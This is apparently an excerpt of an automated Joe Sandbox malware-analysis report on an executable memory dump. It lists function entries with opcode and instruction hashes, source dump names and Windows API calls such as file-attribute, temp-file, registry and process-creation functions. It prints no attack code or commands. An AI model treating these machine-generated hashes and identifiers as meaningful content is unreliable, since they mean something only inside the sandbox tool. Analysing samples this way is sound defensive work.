                                                                                                                                                                                                                                                              • Instruction ID: 73a589aadd6280c1d4df6f0517975a2c4eda39665482ce8a8b3e558a14f083aa
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd7b7cc6089db85a917c869ea418fe9b4336126d354651c2af7450458f0d2819
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD32CF75E04269CFEB64CF28C940BA9BBB2BB48300F1581EAD889B7381D7745E85CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 96471980e818e90389b8f28b0725736ff68ec6d8f08f1ae4e00d8e9b25cb3d10
                                                                                                                                                                                                                                                              • Instruction ID: 2ff6cda69edbaac919d86c53bc6808f5f303a55c6bc0211467f0ef21a37139c8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 96471980e818e90389b8f28b0725736ff68ec6d8f08f1ae4e00d8e9b25cb3d10
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7229B74E05269CBEB64CF18C980BA9BBB2BB48300F1482EAD84DB7381D7345E85CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Global$AllocFree
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3394109436-0
                                                                                                                                                                                                                                                              • Opcode ID: 40efa2268de9016f5e6645c0c9238ed231c7493705202486a25610001e8f553c
                                                                                                                                                                                                                                                              • Instruction ID: 196290a36a957acb70ae20b533fcf0c155bb910872d15f7e614b6225c37c67e6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40efa2268de9016f5e6645c0c9238ed231c7493705202486a25610001e8f553c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05026CB4D05268CFDBA4CF68C980B99BBF1BB48300F1082EAD959A7342D7349E85CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00407935: CharNextA.USER32(?,00000000,75923160,?,00408184,?,?,?,00000000,?,004085CF), ref: 0040794A
                                                                                                                                                                                                                                                                • Part of subcall function 00407935: CharNextA.USER32(75923160,?,00408184,?,?,?,00000000,?,004085CF), ref: 00407952
                                                                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(00000000,00000000), ref: 00401930
                                                                                                                                                                                                                                                                • Part of subcall function 004078A4: CharNextA.USER32 ref: 004078BE
                                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32 ref: 004018E0
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CharNext$AttributesCurrentDirectoryFile
                                                                                                                                                                                                                                                              • String ID: \
                                                                                                                                                                                                                                                              • API String ID: 15404496-2967466578
                                                                                                                                                                                                                                                              • Opcode ID: d78038b2043e385ee061b609f29dc6a012e38869a8f0274da12750c867810de6
                                                                                                                                                                                                                                                              • Instruction ID: b3c069ff8fe5fca2169c100ba5b4309268a8952e4838bd2cd3cdfa24001796cc
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d78038b2043e385ee061b609f29dc6a012e38869a8f0274da12750c867810de6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E22196B19087419ED7107F2A8C4476ABBE8AF41314F15897FE4D5A33E1D63D4581CB2B
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                                                                              • String ID: 0u
                                                                                                                                                                                                                                                              • API String ID: 3850602802-3203441087
                                                                                                                                                                                                                                                              • Opcode ID: 0f8c1266bbb926ccc1bd59e027622b1526ca312be5caf6883b3757b9e2fe7e12
                                                                                                                                                                                                                                                              • Instruction ID: 587040a18b5e8d3ddabbac84dae9583a5ca4581ff6aa0f06bd791ecb2da4f76d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f8c1266bbb926ccc1bd59e027622b1526ca312be5caf6883b3757b9e2fe7e12
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2811B172A043009FC710BF29D88911BBFE8EB40351F50C67EF854A73A0E338D6058B99
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                              • String ID: nsa
                                                                                                                                                                                                                                                              • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                              • Opcode ID: b0a3207c486979766b199e0870a403b1f3979b7e2f67fc1e41fde7ae102ddd2e
                                                                                                                                                                                                                                                              • Instruction ID: 856d399887dd27b7ff2090b6ba205bffd5fa5b63c1769944cd833ed7d7811f75
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b0a3207c486979766b199e0870a403b1f3979b7e2f67fc1e41fde7ae102ddd2e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2CF0C272E082049FCB10AF69D88879FBFB4EF84310F00843AE95497380D6749515CB97
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: a578235fd7ef3aed2a2d552e65bc1af2bfd9bf356f91058c6dae311955d0e3a7
                                                                                                                                                                                                                                                              • Instruction ID: 373024fc2fed516bdc636a623b7a3c01618f37309bfd328d060bf71c45cb50f6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a578235fd7ef3aed2a2d552e65bc1af2bfd9bf356f91058c6dae311955d0e3a7
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2FE18A75E05269CFEB64CF68C980B99BBB1BB48300F1081EAD84DA7381D774AE85CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 1580e02ebf7c4fca29966eb1b7433a0a3187ed73c579ff4eb24ab240cbf4b120
                                                                                                                                                                                                                                                              • Instruction ID: a08f90893e9a4040dbcaa68aabc4f5c37fecb49a8b953bcbec771c1c1b16f75e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1580e02ebf7c4fca29966eb1b7433a0a3187ed73c579ff4eb24ab240cbf4b120
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1E18974E05269CFEB64CF68C984BA9BBB1BB48300F1481EAD859B7381D7349E85CF15
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Global$AllocFree
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3394109436-0
                                                                                                                                                                                                                                                              • Opcode ID: 1376a99fa1b3c8b711226efaa9cd125e7b0aae65b997332d787d10eea2378ea6
                                                                                                                                                                                                                                                              • Instruction ID: cf37d5954fa70898b434e0d26c6706b10c8171271484cbeb9454a15f2979c00d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1376a99fa1b3c8b711226efaa9cd125e7b0aae65b997332d787d10eea2378ea6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58E19B74E05269CFEB64CF68C984BA9BBB1BB48300F1485EAD849A7381D7349E85CF15
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • Opcode ID: 0d3edd96235aad2e448edd85fe0051959f4d3e71b7dd2dead95b0c62df9fb41c
                                                                                                                                                                                                                                                              • Instruction ID: 6ef1666d030b3683f745449ade9432935f6c1ed2423b4b2fea7fa3c30e0d11e8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d3edd96235aad2e448edd85fe0051959f4d3e71b7dd2dead95b0c62df9fb41c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DFD169B4D05269CFEB64CF68C984B99BBB1BB48300F1081EAD84DA7391D734AE85CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • Opcode ID: b40b5ad18bbb895345efcde55e0179b9719697a428ab1875b5866f95c7fbef08
                                                                                                                                                                                                                                                              • Instruction ID: 98c6a34e011fea02c5fd1f307661bc496968a447f3de359247ec3e7382062383
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b40b5ad18bbb895345efcde55e0179b9719697a428ab1875b5866f95c7fbef08
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54D178B4D052698FEB64CF68C980B99BBB1BB48300F1481EAD84DA7381D734AE85CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • Opcode ID: d5d30ce3705b240a9fa9085b13145e6071c26e30a1f734f08b0bddea23f27e83
                                                                                                                                                                                                                                                              • Instruction ID: bea8f09e258bf7577ce88e7167e750fa30ab14cfac5afba0003b10e989aa1f51
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5d30ce3705b240a9fa9085b13145e6071c26e30a1f734f08b0bddea23f27e83
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9FD169B4D05269CFEB64CF68C984B99BBB1BB48300F1481EAD849B7381D734AE85CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • Opcode ID: bafe15afffcb6701d4c5351ddd9df98beec2791fc1c3a27858b249eb881a6424
                                                                                                                                                                                                                                                              • Instruction ID: cf999dc1e13fdb9e3b794afb24179b6ab6f8fffdfeb4e36a57addd35a861b0c2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bafe15afffcb6701d4c5351ddd9df98beec2791fc1c3a27858b249eb881a6424
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DCC17A74D05269CFEB64CF68C980B99BBB1BB48300F1481EAD849B7381D734AE85CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • Opcode ID: cff38268b4a69b6e7d209897343a178ab99337e8fe27efdfc199a24eb5041e59
                                                                                                                                                                                                                                                              • Instruction ID: a16c7d6d65317efe9c57d887f34a02eee03e71a6b958f13de8b6000bf5c2667a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cff38268b4a69b6e7d209897343a178ab99337e8fe27efdfc199a24eb5041e59
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8C17BB4D05269CFDB64CF68C984B99BBB1BB48300F1081EAD84DA7381D734AE85CF15
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CloseCreateValue
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1818849710-0
                                                                                                                                                                                                                                                              • Opcode ID: 34cad2bc1fa3e13494afe16162c9cd95c8c0f10228bda9fb96df882e3ad3404d
                                                                                                                                                                                                                                                              • Instruction ID: aa20071d88737d2ca076d9582247293cc4c89cd0404862d20b3ad10084441af9
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34cad2bc1fa3e13494afe16162c9cd95c8c0f10228bda9fb96df882e3ad3404d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 813150B09083018FD710EF25C94835ABBF4FB84315F10886EF489A7391D7799A89DF9A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                                                                                              • String ID: <@
                                                                                                                                                                                                                                                              • API String ID: 2738559852-4072043054
                                                                                                                                                                                                                                                              • Opcode ID: d6535b1fd4e4f43d190a1083287ca5501c92c386e3f1a77b6dec29ccffe7340a
                                                                                                                                                                                                                                                              • Instruction ID: af84ff8d7bbf5bb76e19132ef8cd2b24e5e30c6edf1d6b1d64d2a00a1082e161
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6535b1fd4e4f43d190a1083287ca5501c92c386e3f1a77b6dec29ccffe7340a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1EF0ACB1904309AFC700EF69C58454EBBF4AB48354F408839E85993251E734E604CF56
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00407CB6: lstrcpynA.KERNEL32(?,?,?,?,?,?,00404457), ref: 00407CD1
                                                                                                                                                                                                                                                                • Part of subcall function 00407935: CharNextA.USER32(?,00000000,75923160,?,00408184,?,?,?,00000000,?,004085CF), ref: 0040794A
                                                                                                                                                                                                                                                                • Part of subcall function 00407935: CharNextA.USER32(75923160,?,00408184,?,?,?,00000000,?,004085CF), ref: 00407952
                                                                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,00000000,?,?,?,00000000,?,004085CF), ref: 004081BE
                                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000,?,?,00000000,?,?,?,00000000,?,004085CF), ref: 004081F7
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3248276644-0
                                                                                                                                                                                                                                                              • Opcode ID: 2da7ec1753567bed1e155ededaacee0951334442434f81bdc17e756d419ccca8
                                                                                                                                                                                                                                                              • Instruction ID: a4b91be4712b2a5abe4fc9de88cdddcc6cd402f2cf4946f98fb9fcd9c72e04c7
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2da7ec1753567bed1e155ededaacee0951334442434f81bdc17e756d419ccca8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6118FB0508314AAD710ABA69A4167A7BD89F05354F46447FECC0AA285CB3C5852866F
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3712363035-0
                                                                                                                                                                                                                                                              • Opcode ID: ecd803767c42d0115cc6630c5d6204aa1c870829ebe70ed70b47319080a31035
                                                                                                                                                                                                                                                              • Instruction ID: e526153969689a3bb24f951f69113ce00b5f3314808de7d96251afda99080b29
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ecd803767c42d0115cc6630c5d6204aa1c870829ebe70ed70b47319080a31035
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F01BDB4A083058FE700DF65C55874BBBF4BB88348F40892CE984AB380D7B9D5498BDA
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32 ref: 00407A85
                                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,00403F5B), ref: 00407AC4
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 415043291-0
                                                                                                                                                                                                                                                              • Opcode ID: 426097edd153d553548d4258e2616868f6f2f385adb449bbb098b549bd1fea02
                                                                                                                                                                                                                                                              • Instruction ID: df9a40891ed5a6603638aa450cb2a5da2b508cd079f162d5418714098e0b767a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 426097edd153d553548d4258e2616868f6f2f385adb449bbb098b549bd1fea02
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2F0D4B06083059FC700EF29D48874EBBF4BF88354F50892CE89987391D374D9848FA2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,00000000,00000000), ref: 00407A53
                                                                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,?,00000000,00000000), ref: 00407A69
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                                                              • Opcode ID: bbe73ec25996ed32e413a4c8f7db69d9afd32e501594e36b189c3cfe4dd8ed10
                                                                                                                                                                                                                                                              • Instruction ID: 98ca1ea5d0757272cd0f040fa3ed5e2b23fe950f5b76aa7c06b1bcfd26805678
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bbe73ec25996ed32e413a4c8f7db69d9afd32e501594e36b189c3cfe4dd8ed10
